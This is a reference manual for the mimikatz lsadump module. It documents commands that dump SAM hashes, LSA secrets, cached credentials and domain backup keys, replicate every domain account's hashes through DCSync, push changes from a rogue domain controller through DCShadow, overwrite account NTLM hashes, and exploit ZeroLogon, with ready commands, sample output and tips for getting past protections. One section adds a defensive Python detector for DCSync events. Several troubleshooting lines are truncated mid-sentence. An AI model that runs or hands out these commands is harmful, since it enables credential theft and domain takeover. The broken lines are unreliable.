lsadump Module Reference
The lsadump module extracts or manipulates secrets that the Local Security Authority (LSA) and
related directory services maintain. The commands below are documented in the order they are
registered in the module table so that the CLI syntax mirrors the implementation.
Each subsection summarizes the goal of the command, lists the accepted flags, and explains why you
would use each option in practice. Unless noted otherwise, commands default to operating on the
local machine using the live registry and LSASS process.
lsadump::sam
Reads the SAM database and decrypts local account password hashes. It can operate online or against
exported hive files.
| Flag | Purpose | Why use it |
|---|---|---|
| /system:<path> | Opens an offline SYSTEM hive and derives the SysKey from it. | Required when dumping hashes from offline hives where LSASS is not available; also allows point-in-time analysis. |
| /sam:<path> | Opens an offline SAM hive that pairs with the supplied SYSTEM hive. | Lets you read SAM data from another installation or from backup copies. |
Without flags the command opens the local registry and queries HKLM\SYSTEM and HKLM\SAM
through the registry APIs.
mimikatz # lsadump::sam
Example output:
Domain : WORKSTATION
SysKey : 2a8e5a05ce5409321c5d1d51f40ca1ea
RID 000001F4 (Administrator)
Hash NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
RID 000001F5 (Guest)
Hash NTLM : aad3b435b51404eeaad3b435b51404ee
mimikatz # lsadump::sam /system:C:\Temp\SYSTEM /sam:C:\Temp\SAM
Example output:
Domain : LABPC
SysKey : a93e0d012ac8ff2db2f1cbba91c56064
...
Troubleshooting:
- ERROR kuhl_m_lsadump_sam ; kull_m_registry_OpenAndQueryWithAlloc 0x00000005 – The account SeDebugPrivilege. Run mimikatz as an elevated administrator or on
- ERROR kull_m_registry_OpenHive ; CreateFile (C:\Temp\SAM) 0x00000002 – The specified hive
- /system and /sam do not come from the same snapshot the

lsadump::secrets
Retrieves LSA secrets such as service account passwords and DPAPI master keys. Works online or with
exported hives.
| Flag | Purpose | Why use it |
|---|---|---|
| /system:<path> | Loads an offline SYSTEM hive to recover the SysKey needed to decrypt secrets. | Essential when analyzing another system’s hives offline. |
| /security:<path> | Loads an offline SECURITY hive that contains the LSA secrets. | Required when decrypting secrets from offline registry copies. |
When no path is supplied, the command reads the local HKLM\SYSTEM and HKLM\SECURITY
keys to obtain the SysKey and the encrypted secrets before decrypting them in place.
mimikatz # lsadump::secrets
Example output:
Secret : $MACHINE.ACC
Local machine account NTLM : 8026cd7d0d2664f3e0b2c672c1ab45be
Secret : DPAPI_SYSTEM
Credential BLOB : 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000...
mimikatz # lsadump::secrets /system:D:\Forensics\SYSTEM /security:D:\Forensics\SECURITY
Troubleshooting:
- ERROR kuhl_m_lsadump_secrets ; kull_m_registry_Open – Typically occurs when hives are locked
- ERROR kuhl_m_lsadump_secrets ; kull_m_dpapi_system_from_registry 0x00000057 – Indicates the
- SeTrustedCredmanAccessPrivilege, run mimikatz as

lsadump::cache
Extracts cached domain logon data (NL$KM and DCC credentials) and optionally replaces entries for a
specific user. Accepts all parameters from lsadump::secrets plus additional cache controls.
| Flag | Purpose | Why use it |
|---|---|---|
| /system:<path> | Load an offline SYSTEM hive to derive the SysKey. | Needed when working with offline registry dumps. |
| /security:<path> | Load an offline SECURITY hive that stores cached credentials. | Required when modifying or reading caches from offline data. |
| /user:<name> | Enable “cache replace” mode for a specific user. | Allows injecting custom cache material for testing or persistence. |
| /dcc:<hex> | Provide a hexadecimal DCC hash to insert for the chosen user. | Supplies a pre-computed DCC hash when you do not want to derive it from a password. |
| /ntlm:<hex> | Provide an NTLM hash that will be turned into a DCC entry. | Useful when you only have the NTLM hash of the user. |
| /password:<string> | Let the tool derive the NTLM hash from a clear-text password. | Handy when you know the password but not the hash. |
| /subject:<CN> | Open the current user certificate store and acquire the private key of the certificate whose subject matches <CN>. | Required to decrypt machine-bound cache data that is protected by a smart-card or certificate private key. |
The command builds the appropriate crypto context depending on the supplied arguments before
reading or editing the cached credentials.
mimikatz # lsadump::cache
Example output:
NL$KM secret key : 9340a997f3fb32f651f6c2642965d1af
Domain : CONTOSO ; User : alice ; Iterations : 10240
DCC1 : 7d5a8d8f554a8a7f0acd2e0d9cc9b5df
mimikatz # lsadump::cache /user:alice /password:P@ssw0rd!
mimikatz # lsadump::cache /user:svcbackup /dcc:5f3e62d... /subject:"CN=Smart Card Logon"
Troubleshooting:
- ERROR kuhl_m_lsadump_cache after specifying /user but no hash – Provide one of /dcc, /ntlm, or /password so the tool knows what to inject.
- ERROR kull_m_certificates_get ; CertFindCertificateInStore – The certificate subject could
- 0x00000005 access denied – Occurs without SYSTEM-level rights. Run mimikatz as SYSTEM using psexec, Task Scheduler, or token::elevate.

lsadump::lsa
Queries the SAM service through LSASS to extract user password data or supplemental credentials. The
command supports multiple access strategies to work around protections.
| Flag | Purpose | Why use it |
|---|---|---|
| /patch | Patches samsrv.dll in LSASS to bypass security checks before retrying the dump. | Helps when direct RPC calls are blocked by hardening; performs a just-in-time in-memory patch. |
| /inject | Injects a helper thread into LSASS that executes the extraction logic. | Useful when patching is not possible but you can run code in LSASS. |
| /id:<rid> | Target a specific RID (relative identifier). | Focuses on a single account when you already know the RID. |
| /name:<user> or /user:<user> | Target a specific account by name. | Dumps credentials for one account without enumerating the entire domain. |
Without filters the command enumerates every user in the SAM domain and displays their password hashes and supplemental credentials.
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
Example output:
Domain : CONTOSO / S-1-5-21-...
SAMKey : 36eb5e11ba4ee6a5e73028a96b8a7707
RID 000001F4 (Administrator)
Hash NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Supplemental Credentials...
mimikatz # lsadump::lsa /inject /name:alice
Troubleshooting:
- ERROR kuhl_m_lsadump_lsa with STATUS_ACCESS_DENIED – Ensure privilege::debug succeeded
- /patch may fail. Try /inject
- RPC_S_SERVER_UNAVAILABLE – The SAM service is not reachable (for remote targets). Verify the

lsadump::trust
Lists trust relationships and extracts the shared keys used between domains.
| Flag | Purpose | Why use it |
|---|---|---|
| /patch | Temporarily patches LSASS trust routines before retrying. | Required on hardened builds where trust APIs refuse to return secrets. |
| /system:<hostname> | Perform the policy lookup on a remote system instead of the local computer. | Allows querying trust data from another domain controller when run with the proper rights. |
If patching is not requested the command opens the target LSA policy and enumerates every trusted domain, printing inbound and outbound authentication information as well as historical values.
mimikatz # lsadump::trust
Example output:
* CONTOSO -> FABRIKAM
Incoming current : 5dc7... (AES256)
Outgoing current : 8ab1... (AES256)
mimikatz # lsadump::trust /patch /system:dc01.corp.local
Troubleshooting:
- LsaOpenPolicy access denied – Your account lacks SeTcbPrivilege. Run mimikatz as Domain
- RPC_S_SERVER_UNAVAILABLE – The remote host is unreachable. Check firewall settings and

lsadump::backupkeys
Fetches domain backup keys (G$BCKUPKEY_*) and optionally exports them to files for later DPAPI
operations.
| Flag | Purpose | Why use it |
|---|---|---|
| /guid:<GUID> | Retrieve a specific backup key by GUID. | Lets you pull non-preferred keys directly when you already know their identifier. |
| /system:<hostname> | Query a remote LSA instance instead of the local machine. | Enables pulling backup keys from another domain controller. |
| /export | Write the recovered material to disk in addition to printing it. | Creates .pfx, .der, or .key files that can be reused by DPAPI tooling. |
| /secret | Use the LsaRetrievePrivateData secret API path. | Necessary when remote policy handles require the secret flag. |
Without /guid the command first resolves the preferred and legacy GUIDs before retrieving and analyzing each key, exporting when requested.
mimikatz # lsadump::backupkeys /export
Example output:
Preferred key GUID : {15d0a512-...}
* saving to : backupkey_{15d0a512-...}.pfx
mimikatz # lsadump::backupkeys /system:dc02.corp.local /guid:{2f17...} /secret
Troubleshooting:
- LsaOpenPolicy failures – Run with domain admin credentials and ensure the remote DC allows Remote Registry / RPC access.
- ERROR kuhl_m_lsadump_backupkeys_oeKey – Export failed because the output directory is not writable. Launch mimikatz from a directory where you have write access or specify another path with cd.
- .pfx file – /export only works when the command successfully retrieved the key. Check for upstream errors and ensure the account can query backup keys.

lsadump::rpdata
Reads arbitrary LSA private data blobs by name.
| Flag | Purpose | Why use it |
|---|---|---|
| /name:<SecretName> | The registry secret to retrieve. | Mandatory: identifies which LSA private data to dump. |
| /system:<hostname> | Query a remote LSA instance. | Use when the secret lives on another host. |
| /secret | Request the data via the secret API. | Required for some remote retrieval scenarios. |
| /export | Reserved for future export support (currently unused). | Included for completeness; no additional action today. |
If the secret is found its raw bytes are printed in hexadecimal form.
$MACHINE.ACC secret locally:
mimikatz # lsadump::rpdata /name:$MACHINE.ACC
Example output:
data : 00000000 60 00 00 00 e8 03 00 00 08 00 00 00 41 00 64 00 |`...........A.d.|
mimikatz # lsadump::rpdata /system:dc01.corp.local /name:MySecret /secret
Troubleshooting:
- ERROR kuhl_m_lsadump_rpdata ; kull_m_lsa_getDomainInfo – Usually triggered by insufficient rights. Run as SYSTEM or Domain Admin.
- ERROR kuhl_m_lsadump_rpdata ; LsaRetrievePrivateData 0xC0000034 (STATUS_OBJECT_NAME_NOT_FOUND) – The secret name is wrong or does not exist. Double-check the spelling and case sensitivity.
- /export has no effect – The flag is not implemented; remove it unless future builds add support.

lsadump::dcsync
Uses the DRS replication protocol to request password data for directory objects from a domain
controller.
| Flag | Purpose | Why use it |
|---|---|---|
| /domain:<fqdn> | Target a specific Active Directory domain. | Required when the current logon domain is not the one you want to replicate. |
| /dc:<fqdn> or /kdc:<fqdn> | Choose the domain controller to contact. | Ensures the request hits a reachable controller or one with particular replication data. |
| /user:<samAccountName> | Replicate a single account by name. | Typical case for extracting a specific user or the krbtgt account. |
| /guid:<GUID> | Replicate by object GUID instead of name. | Useful when the object has been renamed or you want to avoid ambiguity. |
| /all | Iterate through objects and dump the entire domain. | Performs a full replication-style dump for large-scale analysis. |
| /export | Request export-friendly attribute selection. | Limits replication to attributes that are safe to write to disk. |
| /csv | Print results in CSV format. | Simplifies automated parsing. |
| /deleted | Include deleted objects. | Important when hunting for lingering deleted accounts. |
| /uac | Decode the userAccountControl flag to human-readable form. | Helps interpret account status quickly. |
| /laps | Resolve the attribute IDs for LAPS-managed passwords. | Necessary before requesting managed local administrator passwords. |
| /authntlm | Force NTLM authentication for the RPC binding. | Use when Kerberos/Negotiate is unavailable but NTLM is acceptable. |
Connection fine-tuning inherited from the RPC helper is also available: /service, /altservice,
/protseq, /endpoint, /noauth, /ntlm, /kerberos, /negotiate, /null, /authuser,
/authdomain, and /authpassword let you control the RPC binding and authentication context when Kerberos defaults are unsuitable.
krbtgt account using integrated credentials:
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
Example output:
** SAM ACCOUNT **
SAM Username : krbtgt
objectSid : S-1-5-21-...
ntlm : 15f0cf3b1d28a7e53cb17c9b6d8b12c7
supplementalCredentials (Kerberos)
mimikatz # lsadump::dcsync /domain:corp.local /all /csv /authntlm /authuser:CORP\backup /authpassword:P@ssw0rd!
mimikatz # lsadump::dcsync /domain:corp.local /guid:{bd8f...} /laps
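A defender-side check added here as an example (it is neither mimikatz nor Microsoft code): the replication request that dcsync sends is recorded on the domain controller as Security event 4662 with the replication control-access GUIDs in its Properties field, provided directory-service access auditing is enabled on the domain object. Domain controllers exercise those rights continuously, so the signal is a subject that is not a DC computer account. The event records, the DC inventory in DC_ACCOUNTS, and the helper names are constructed for this example.

```python
"""Added example (not mimikatz code): triage Security event 4662 for DCSync-style
replication requests. Event records and the DC inventory are constructed here."""
import re

# Control-access rights that a DRS replication request exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed inventory of legitimate replication partners; replace with your own DC list.
DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed 4662 records reduced to the fields the check needs. The first is a DC
# replicating normally, the second is a user account doing the same thing.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
     "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
     "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "alice", "SubjectDomainName": "CORP",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "{bf967a68-0de6-11d0-a285-00aa003049e2}",
     "AccessMask": "0x10"},
    {"EventID": 4624, "SubjectUserName": "bob", "SubjectDomainName": "CORP"},
]

_GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_guids(event: dict) -> list:
    """Names of the replication rights present in a 4662 Properties field (sorted)."""
    if event.get("EventID") != 4662:
        return []
    found = [g.lower() for g in _GUID_RE.findall(event.get("Properties", ""))]
    return sorted({REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS})


def is_suspicious(event: dict, dc_accounts=DC_ACCOUNTS) -> bool:
    """DCSync signal: replication rights exercised by a subject that is not a DC."""
    rights = replication_guids(event)
    subject = event.get("SubjectUserName", "").upper()
    return bool(rights) and subject not in {a.upper() for a in dc_accounts}


def triage(events, dc_accounts=DC_ACCOUNTS) -> list:
    """(DOMAIN\\subject, rights) for each suspicious event, in input order."""
    return [(f"{e['SubjectDomainName']}\\{e['SubjectUserName']}", replication_guids(e))
            for e in events if is_suspicious(e, dc_accounts)]


if __name__ == "__main__":
    for subject, rights in triage(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Two caveats apply when this runs against real logs: the SACL on the domain naming context must actually audit these control-access rights for 4662 to be generated at all, and an attacker running dcsync from a compromised DC account (or with /authuser set to one) will not trip the account filter, so pairing this with the source address of the RPC session is the stronger check.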
Troubleshooting:
- ERROR kuhl_m_lsadump_dcsync ; kull_m_rpc_createBinding 0x000006BA (RPC_S_SERVER_UNAVAILABLE) – The DC is unreachable.
- DsReplicaSync access denied – The account lacks the Replicating Directory Changes and Replicating Directory Changes All rights. Grant the rights or use a Domain Admin account.
- KRB_AP_ERR_SKEW – Time skew prevents Kerberos authentication. Sync the attacking machine’s
- /authntlm to fall back to NTLM.

lsadump::dcshadow
Implements DCShadow to register a rogue domain controller, push custom replication metadata, or
manage staged modifications.
| Flag | Purpose | Why use it |
|---|---|---|
| /stack | Add the supplied object/attribute/value triplet to the in-memory request stack. | Build multi-step changes before interacting with a real DC. |
| /viewstack | Display the currently stacked changes. | Review pending modifications for accuracy. |
| /clearstack | Delete all stacked changes. | Reset the staging area without touching a DC. |
| /push | Register, push, and (if needed) unregister using the stacked data. | Executes the full DCShadow workflow automatically. |
| /manualregister | Only perform the registration phase. | Useful when you want to register now and push later. |
| /manualpush | Only push the already prepared data. | Lets you separate staging from replication. |
| /manualunregister | Explicitly unregister the rogue controller. | Cleans up without executing a full push. |
| /addentry | Directly call DRSAddEntry with the stacked object(s). | Adds replication data without starting the listener. |
| /viewreplication | Start the server but merely observe incoming replication requests. | Good for debugging the payload that real controllers send. |
| /kill:<DN> | Trigger lingering object cleanup against the provided DN. | Removes lingering objects after a push or as a standalone operation. |
| /config, /schema, /root | Select which naming contexts are synchronized during a push. | Restrict replication to configuration or schema partitions, or default to the domain NC when /root (explicitly or implicitly) is set. |
| /domain:<fqdn> | Override the domain used to discover metadata. | Necessary when operating outside the current logon domain. |
| /dc:<fqdn> | Choose the legitimate domain controller that the rogue DC registers with and pushes its changes to. | Ensures LDAP and RPC calls are directed to the intended host. |
| /computer:<NetBIOS> | Set the NetBIOS name for the fake DC (defaults to the local hostname). | Prevents name collisions or helps impersonate a specific server. |
| /object, /attribute, /value | Define the attribute data to stage when used with /stack or /addentry. | Supplies the actual modifications that DCShadow will replicate. |
| /multiple | Allow multiple values for the same attribute. | Needed when adding multi-valued attributes. |
| /clean | Remove an object or attribute from the stack instead of adding it. | Correct staging mistakes without rebuilding the whole stack. |
| /replOriginatingUid, /replOriginatingUsn, /replOriginatingTime | Set custom replication metadata. | Craft precise replication provenance for advanced scenarios. |
| /dynamic | Mark the object as dynamic. | Required when staging dynamic objects such as DNS records. |
| /remotemodify | (with /addentry) allow remote modification semantics. | Permits updates that would otherwise be rejected. |
Once connected to LDAP the command gathers schema, domain, and controller metadata, encodes the
stacked changes, and executes the requested workflow (registration, push, lingering cleanup, etc.).
mimikatz # lsadump::dcshadow /stack /object:"CN=svcaccount,OU=Service Accounts,DC=corp,DC=local" /attribute:servicePrincipalName /value:"HOST/app01.corp.local"
mimikatz # lsadump::dcshadow /push /domain:corp.local /dc:dc01.corp.local
Example output (truncated):
[+] DCShadow : Registering in LDAP with GUID {4b1a...}
[+] Pushing 1 change(s) to DC dc01.corp.local
[+] Attribute servicePrincipalName updated successfully
[+] Unregistering the rogue DC
mimikatz # lsadump::dcshadow /stack /object:"CN=Test,DC=corp,DC=local" /attribute:description /value:"Updated"
mimikatz # lsadump::dcshadow /viewstack
mimikatz # lsadump::dcshadow /manualregister /domain:corp.local
mimikatz # lsadump::dcshadow /manualpush /dc:dc02.corp.local
Troubleshooting:
- LDAP_CONSTRAINT_VIOLATION – The attribute/value pair violates schema rules. Verify the
- /multiple when setting multi-valued attributes.
- ERROR kuhl_m_lsadump_dcshadow ; DsGetDcName – Domain discovery failed. Provide /domain and /dc explicitly, and make sure DNS can resolve both names.
- SeTcbPrivilege, SeMachineAccountPrivilege) are present.

lsadump::setntlm
Directly sets the NTLM hash (and optionally the LM hash) for an account in SAM.
| Flag | Purpose | Why use it |
|---|---|---|
| /password:<string> | Derive the NTLM hash from a clear-text password. | Convenient when you know the password. |
| /ntlm:<hex> | Supply a 16-byte NTLM hash directly. | Use when you already have the hash. |
| /user:<name> or /rid:<rid> | Select the account to modify. | Required to identify the SAM user. |
| /server:<hostname> | Target a remote SAM server. | Enables editing passwords on another machine. |
If no credentials are provided the command uses a default known hash, making the account revert to a predictable password for later logon.
mimikatz # lsadump::setntlm /user:svcbackup /password:P@ssw0rd!
Example output:
Password : P@ssw0rd!
NTLM : 5f3e62dffd1a4b3e9f82a5c8f8f8cb33
>>> User svcbackup successfully updated
mimikatz # lsadump::setntlm /server:fileserver01 /user:Administrator /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
Troubleshooting:
- SamrSetInformationUser access denied – Requires administrative rights and the SeMachineAccountPrivilege (for machine targets). Use elevated credentials or run as SYSTEM.
- RPC_S_SERVER_UNAVAILABLE – Remote SAMR traffic is blocked. Ensure TCP/445 and 135 are open and that the Remote Registry/SAMR services are enabled.
- /ntlm strings are 32 hexadecimal characters with no spaces.

lsadump::changentlm
Invokes the SAM password change RPC, supplying both the current and the desired password material.
| Flag | Purpose | Why use it |
|---|---|---|
| /oldpassword:<string> or /oldntlm:<hex> | Provide the current credentials. | Required so SAM will authorize the change. |
| /newpassword:<string> or /newntlm:<hex> | Provide the new credentials. | Defines the replacement password. |
| /user:<name> or /rid:<rid> | Select the account. | Mandatory target selector. |
| /server:<hostname> | Point to a remote SAM server. | Allows remote password changes over SAMR. |
If the old or new credentials are omitted the command reuses the built-in default hash, which can be useful for quickly forcing known values onto machine accounts.
mimikatz # lsadump::changentlm /user:svcbackup /oldpassword:P@ssw0rd! /newpassword:S3cur3!
Example output:
Old NTLM : 5f3e62dffd1a4b3e9f82a5c8f8f8cb33
New NTLM : d2d2e8436a9a2b9c8f7d0b9aa3b4c123
>>> Password successfully changed
mimikatz # lsadump::changentlm /user:COMPUTER$ /newntlm:31d6cfe0d16ae931b73c59d7e0c089c0
Troubleshooting:
- STATUS_WRONG_PASSWORD – The supplied /oldpassword or /oldntlm does not match the current
- RPC_S_ACCESS_DENIED – The account lacks permission to change the target password. Use an
- SamrChangePasswordUser fails on remote hosts – Ensure the Remote Registry and SAMR services

lsadump::netsync
Speaks the Netlogon protocol to retrieve current and previous NTLM hashes for domain controllers or
servers.
| Flag | Purpose | Why use it |
|---|---|---|
| /dc:<fqdn> | Target the domain controller. | Mandatory because Netlogon is a server-to-server protocol. |
| /user:<account> | Authenticate as the specified machine or domain account. | Required to build the Netlogon credential chain. |
| /account:<name> | Override the account whose passwords are requested (defaults to /user). | Allows querying trust accounts different from the authenticating identity. |
| /computer:<NetBIOS> | Provide the client computer name (defaults to mimikatz). | Needed when emulating a specific workstation. |
| /ntlm:<hex> | Supply the current NTLM hash for the authenticating account. | Required to derive the Netlogon session key. |
RPC connection modifiers (/remote, /protseq, /service, /endpoint, /noauth, /ntlm,
/kerberos, /negotiate, /null, /authuser, /authdomain, /authpassword) are also available
through the shared helper when finer control over the transport is needed.
mimikatz # lsadump::netsync /dc:dc01.corp.local /user:CORP\dc01$ /ntlm:1f9a...
Example output:
SecureChannelType : ServerSecureChannel
Current NTLM : 4a5e3cfa2b4b8d6571f0d8ad2a1c3f40
Previous NTLM : 7c8d5e2f8a4d9c6b1e0fdd2ca5b1c4d2
mimikatz # lsadump::netsync /dc:dc01.corp.local /user:CORP\dc01$ /ntlm:1f9a... /account:CONTOSO$
Troubleshooting:
- STATUS_NOT_SUPPORTED – Some patched domain controllers block the vulnerable Netlogon flow.
- NetlogonComputeServerDigest mismatch – Indicates the supplied /ntlm hash is wrong. Confirm
- /remote or other modifiers are used incorrectly, fall back to the
- /protseq:ncacn_ip_tcp explicitly.

lsadump::packages
Enumerates installed SSPI packages and optionally runs an outbound authentication sequence to obtain the first token buffer.
| Argument | Purpose | Why use it |
|---|---|---|
| [target] | Optional SPN or target name passed to InitializeSecurityContext. | Use to observe the initial blob a package sends during authentication. |
Each package is listed with capabilities, maximum token size, RPC ID, and version. When a target is provided the command acquires outbound credentials and prints the produced token in hexadecimal so it can be replayed or analyzed.
mimikatz # lsadump::packages
Example output (truncated):
Name : Negotiate
Description : Microsoft Package Negotiator
Capabilities: 00883bb3 ( INTEGRITY ; PRIVACY ; CONNECTION ; MULTI_REQUIRED ; EXTENDED_ERROR ; IMPERSONATION ; ACCEPT_WIN32_NAME ; NEGOTIABLE ; GSS_COMPATIBLE ; LOGON ; RESTRICTED_TOKENS ; APPCONTAINER_CHECKS ; )
MaxToken : 48256
RPCID : 0x0009 (9)
Version : 1
Name : Kerberos
Description : Microsoft Kerberos V1.0
Capabilities: 028f3bbf ( INTEGRITY ; PRIVACY ; TOKEN_ONLY ; DATAGRAM ; CONNECTION ; MULTI_REQUIRED ; EXTENDED_ERROR ; IMPERSONATION ; ACCEPT_WIN32_NAME ; NEGOTIABLE ; GSS_COMPATIBLE ; LOGON ; MUTUAL_AUTH ; DELEGATION ; READONLY_WITH_CHECKSUM ; RESTRICTED_TOKENS ; APPCONTAINER_CHECKS ; ? ; )
MaxToken : 48000
RPCID : 0x0010 (16)
Version : 1
mimikatz # lsadump::packages cifs/dc01.corp.local
Example output snippet:
[Kerberos] Initial token (len=512)
0000 60 82 01 20 06 09 2a 86 48 82 f7 12 01 02 02 01 |`.. ..*.H.......|
Troubleshooting:
- AcquireCredentialsHandle fails – The current logon session lacks credentials for the package.
- sekurlsa::logonpasswords to locate a usable token or run as the target user.
- InitializeSecurityContext returns SEC_E_TARGET_UNKNOWN – The SPN is invalid. Verify the

lsadump::mbc
Displays the machine-bound certificate (MBC) material stored in the registry.
| Flag | Purpose | Why use it |
|---|---|---|
| /system:<path> | Load an offline SYSTEM hive. | Necessary when dumping MBC data from a copied hive. |
Without parameters the command reads the local machine’s registry to locate the
MachineBoundCertificate blob and prints it via the DPAPI helper routines.
mimikatz # lsadump::mbc
Example output:
MachineBoundCertificate :
0000 30 82 03 7a 30 82 02 62 a0 03 02 01 02 02 10 43 |0..z0..b.......C|
mimikatz # lsadump::mbc /system:E:\Offline\SYSTEM
Troubleshooting:
- ERROR kuhl_m_lsadump_mbc – Often caused by missing DPAPI master keys. Make sure lsadump::secrets
- CreateFile errors – The offline SYSTEM hive path is invalid. Verify the path and that mimikatz

lsadump::zerologon
Tests or exploits CVE-2020-1472 against a domain controller’s Netlogon service.
| Flag | Purpose | Why use it |
|---|---|---|
| /account:<DC$> | Specify the target machine account. | Mandatory to craft the challenge/response sequence. |
| /type:<id> | Override the secure channel type with a numeric NETLOGON_SECURE_CHANNEL_TYPE value (default: server, which is 6 ServerSecureChannel; 2 is WorkstationSecureChannel and 4 is TrustedDomainSecureChannel). | Needed when attacking trust relationships instead of DC accounts. |
| /exploit | Switch from detection mode to actively resetting the password to zeroes. | Use cautiously when you intend to take over the target account. |
RPC binding options from the helper (/remote, /protseq, /service, /endpoint, /noauth,
/ntlm, /kerberos, /negotiate, /null, /authuser, /authdomain, /authpassword) are
available to reach the Netlogon endpoint under different transport conditions.
mimikatz # lsadump::zerologon /account:DC01$
Example output:
Testing Netlogon secure channel for DC01$...
[+] Server is vulnerable (challenge accepted)
mimikatz # lsadump::zerologon /account:DC01$ /exploit
Example output:
[+] Server is vulnerable, attempting exploit
[+] Machine account password reset to 0
mimikatz # lsadump::zerologon /account:CONTOSO$ /type:2 /exploit
Troubleshooting:
- STATUS_NOT_SUPPORTED – The domain controller is patched. No remediation other than choosing
- ERROR kuhl_m_lsadump_zerologon ; kull_m_rpc_createBinding 0x000006BA – RPC connection failed.
- lsadump::postzerologon immediately to restore a known password.

lsadump::postzerologon
Resets a domain controller’s machine account password and stored secret after a successful
ZeroLogon-style takeover.
| Flag | Purpose | Why use it |
|---|---|---|
| /target:<hostname> | Domain controller whose password should be reset. | Required to open the right SAM and LSA handles. |
| /account:<DC$> | Machine account name that should receive the new password. | Identifies which machine account to fix. |
The command first changes the SAM password to a known constant and then updates the $MACHINE.ACC LSA secret so the controller and the domain stay in sync.
/exploit:
mimikatz # lsadump::postzerologon /target:dc01.corp.local /account:DC01$
Example output:
[+] Changing SAM password for DC01$
[+] Updating LSA secret $MACHINE.ACC
[+] Domain controller password restored
Troubleshooting:
- RPC_S_ACCESS_DENIED – Requires Domain Admin or equivalent rights. Run mimikatz with
- ERROR kuhl_m_lsadump_postzerologon with STATUS_NO_SUCH_USER – The /account name is wrong.
- $ and the case.